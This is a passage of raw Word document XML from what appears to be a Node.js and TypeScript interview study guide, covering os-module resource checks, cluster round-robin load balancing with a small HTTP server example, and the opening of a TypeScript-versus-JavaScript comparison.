    <w:p w14:paraId="68143206"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console.log('Total Memory:', os.totalmem(), 'bytes');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69CFFFD2"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console.log('Free Memory:', os.freemem(), 'bytes');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B960DDA"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console.log('Load Averages:', os.loadavg());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="769E59FB" w14:textId="77777777" w:rsidR="00D01DA1" w:rsidRPr="00DA2F32" w:rsidRDefault="00D01DA1" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>3. Handling Worker Processes and System Resources</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33EEE0B4"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To manage system resources more effectively by knowing the system's capabilities and current usage.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E2F303B"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235A3548" w14:textId="77777777" w:rsidR="00D01DA1" w:rsidRPr="00DA2F32" w:rsidRDefault="00D01DA1" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="272"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Before spawning worker processes, gather information on available system resources to avoid overloading the system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56BAC9B8" w14:textId="77777777" w:rsidR="00D01DA1" w:rsidRPr="00DA2F32" w:rsidRDefault="00D01DA1" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="272"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Monitor system memory and CPU usage to make informed decisions about scaling and load management.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56D98B62"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3BB9A191"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os = require('os');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B781722"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91C5CED"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totalMemory = os.totalmem();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4025C751"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freeMemory = os.freemem();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="045C3264"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memoryUsage = totalMemory - freeMemory;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6005D023"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A0EB631"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console.log('Memory Usage:', memoryUsage, 'bytes');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="017049BA" w14:textId="77777777" w:rsidR="00D01DA1" w:rsidRPr="00DA2F32" w:rsidRDefault="00D01DA1" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>4. Creating Cross-Platform Applications</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BC90277"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To ensure that your clustered application behaves consistently across different operating systems.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79707B46" w14:textId="77777777" w:rsidR="00D01DA1" w:rsidRPr="00DA2F32" w:rsidRDefault="00D01DA1" w:rsidP="009E0607">
      <w:p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6B36353F" w14:textId="77777777" w:rsidR="00D01DA1" w:rsidRPr="00DA2F32" w:rsidRDefault="00D01DA1" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="273"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Use the os module to handle OS-specific quirks or differences in resource management.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19A5A5CE" w14:textId="77777777" w:rsidR="00D01DA1" w:rsidRPr="00DA2F32" w:rsidRDefault="00D01DA1" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="273"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>For example, adjust worker process settings or handle file paths in a way that is compatible with different operating systems.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75E4632A"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os = require('os');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55BD2B62"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5362272"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if (os.platform() === 'win32') {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18D45312"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console.log('Running on Windows');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2483A358"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else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="691E3D95"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console.log('Running on Unix-based OS');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="482D7C6F" w14:textId="77777777" w:rsidR="00D01DA1" w:rsidRPr="00DA2F32" w:rsidRDefault="00D01DA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AD40B6B" w14:textId="77777777" w:rsidR="0001503C" w:rsidRPr="00DA2F32" w:rsidRDefault="0001503C" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="566BAA68" w14:textId="23C6D8CC" w:rsidR="00BB2F17" w:rsidRPr="00DA2F32" w:rsidRDefault="009A2163" w:rsidP="009E0607">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="99" w:name="_Toc178383282"/>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>What is the default load balancer is being used for clusting</w:t>
      </w:r>
      <w:bookmarkEnd w:id="99"/>
    </w:p>
    <w:p w14:paraId="2A12AE70" w14:textId="77777777" w:rsidR="008C4F8D" w:rsidRPr="00DA2F32" w:rsidRDefault="008C4F8D" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Default Load Balancer: Round-Robin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29BACCC4" w14:textId="77777777" w:rsidR="008C4F8D" w:rsidRPr="00DA2F32" w:rsidRDefault="008C4F8D" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Round-Robin Load Balancing</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E4E3904" w14:textId="77777777" w:rsidR="008C4F8D" w:rsidRPr="00DA2F32" w:rsidRDefault="008C4F8D" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="274"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>How It Works</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: The Round-Robin algorithm distributes incoming connections or requests across the available worker processes in a circular order. Each worker receives requests in turn, so that no single worker is overloaded compared to others.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19EE490A" w14:textId="77777777" w:rsidR="008C4F8D" w:rsidRPr="00DA2F32" w:rsidRDefault="008C4F8D" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="274"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Behavior</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: When a new request comes in, the master process directs it to the next worker in line. After the last worker, it starts over with the first worker.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6574BE67" w14:textId="77777777" w:rsidR="008C4F8D" w:rsidRPr="00DA2F32" w:rsidRDefault="008C4F8D" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Implementation Details</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AB950FB" w14:textId="77777777" w:rsidR="008C4F8D" w:rsidRPr="00DA2F32" w:rsidRDefault="008C4F8D" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="275"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Internal Mechanism</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: The Node.js cluster module automatically handles this load balancing internally. When you create a cluster and fork worker processes, the master process listens for incoming connections and distributes them to the worker processes using the Round-Robin approach.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="426485AD" w14:textId="77777777" w:rsidR="008C4F8D" w:rsidRPr="00DA2F32" w:rsidRDefault="008C4F8D" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="275"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Networking</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: For network-related applications, the master process uses a shared server handle, so that each worker process can handle incoming connections. This ensures that all worker processes share the same port.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2569052E" w14:textId="77777777" w:rsidR="008C4F8D" w:rsidRPr="00DA2F32" w:rsidRDefault="008C4F8D"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48F88C8D" w14:textId="77777777" w:rsidR="008C4F8D" w:rsidRPr="00DA2F32" w:rsidRDefault="008C4F8D" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Here’s a basic example of how clustering and Round-Robin load balancing are implemented:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C78A93F"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cluster = require('cluster');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C01AC0F"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http = require('http');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07326A95"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numCPUs = require('os').cpus().length;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="342F9345"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031A04D"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if (cluster.isMaster) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ADF6278"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console.log(`Master ${process.pid} is running`);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56D16DC9"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B6D89D8"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Fork workers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="744DE46E"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for (let i = 0; i &lt; numCPUs; i++) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B413C4E"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cluster.fork();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40B36F5A"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EC3A2A4"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2434A56"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cluster.on('exit', (worker, code, signal) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A87C080"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console.log(`Worker ${worker.process.pid} died`);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64F0C0B2"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31D5079"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else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16A4E356"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Workers share the same TCP connection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EB2289E"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http.createServer((req, res) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23CD2618"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res.writeHead(200);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="103B2164"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res.end('Hello, world!\n');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="477CB56C"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}).listen(8000);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1648BDA3" w14:textId="77777777" w:rsidR="008C4F8D" w:rsidRPr="00DA2F32" w:rsidRDefault="008C4F8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F9FE20A" w14:textId="77777777" w:rsidR="008C4F8D" w:rsidRPr="00DA2F32" w:rsidRDefault="008C4F8D" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>In this example, the master process forks a number of worker processes equal to the number of CPU cores. When incoming HTTP requests arrive at port 8000, they are distributed among the workers using the Round-Robin algorithm.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33AF92F1" w14:textId="77777777" w:rsidR="008C4F8D" w:rsidRPr="00DA2F32" w:rsidRDefault="008C4F8D" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Limitations and Considerations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71A50462" w14:textId="77777777" w:rsidR="008C4F8D" w:rsidRPr="00DA2F32" w:rsidRDefault="008C4F8D" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="276"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Simple Distribution</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: While Round-Robin is effective for evenly distributing requests, it does not take into account the individual worker’s current load or performance. All workers are treated equally regardless of their current state.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62A625D3" w14:textId="77777777" w:rsidR="008C4F8D" w:rsidRPr="00DA2F32" w:rsidRDefault="008C4F8D" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="276"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Not Suitable for All Scenarios</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: In cases where requests are not equally demanding or when some workers might become overloaded, additional load balancing strategies or more sophisticated approaches might be needed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73ADE9C8" w14:textId="77777777" w:rsidR="0001503C" w:rsidRPr="00DA2F32" w:rsidRDefault="0001503C" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A1FF0E1" w14:textId="77777777" w:rsidR="00BB2F17" w:rsidRPr="00DA2F32" w:rsidRDefault="00BB2F17" w:rsidP="009E0607">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F040FF4" w14:textId="7B753284" w:rsidR="00BB2F17" w:rsidRPr="00DA2F32" w:rsidRDefault="009A2163" w:rsidP="009E0607">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="100" w:name="_Toc178383283"/>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>TypeScript</w:t>
      </w:r>
      <w:bookmarkEnd w:id="100"/>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="737F9366" w14:textId="3FB7E32B" w:rsidR="00D246F0" w:rsidRPr="00DA2F32" w:rsidRDefault="009A2163" w:rsidP="009E0607">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="101" w:name="_Toc178383284"/>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>What is TypeScript, and how does it differ from JavaScript?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="101"/>
    </w:p>
    <w:p w14:paraId="5776C76D" w14:textId="77777777" w:rsidR="00081C16" w:rsidRPr="00DA2F32" w:rsidRDefault="00081C16" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Key Differences Between TypeScript and JavaScript</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02CD8D3F" w14:textId="77777777" w:rsidR="00081C16" w:rsidRPr="00DA2F32" w:rsidRDefault="00081C16" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="277"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Static Typing vs. Dynamic Typing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22B06BE7"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TypeScript</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Supports static typing. Types are explicitly declared and checked at compile time. This can prevent many types of runtime errors and improve code quality.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6528315E"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3E5524A5"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age: number = 30;</w:t>
      </w:r>
    </w:p>
